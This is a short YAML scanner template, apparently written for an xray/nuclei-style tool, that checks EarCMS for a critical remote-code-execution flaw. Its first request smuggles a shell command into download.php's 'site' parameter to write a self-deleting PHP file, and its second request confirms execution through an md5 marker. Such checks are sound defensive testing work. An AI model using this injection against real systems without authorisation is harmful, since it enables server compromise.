id: earcms-download-php-exec

info:
  name: EarCMS Download PHP executable
  author: xpoc
  severity: critical
  verified: false
  description: |
    FOFA: app="EearCMS"
  reference:
    - https://zhuanlan.zhihu.com/p/81934322
  tags: earcms,rce
  created: 2023/06/22

set:
    r1: randomInt(40000, 44800)
    randname: randomLowercase(6)
rules:
    r0:
        request:
            method: GET
            path: /source/pack/127.0.0.1/download.php?site=1%3Becho+%27%3C%3Fphp+echo+md5%28{{r1}}%29%3Bunlink%28__FILE__%29%3B%3F%3E%27+%3E+{{randname}}.php%3B
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /source/pack/127.0.0.1/{{randname}}.php
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()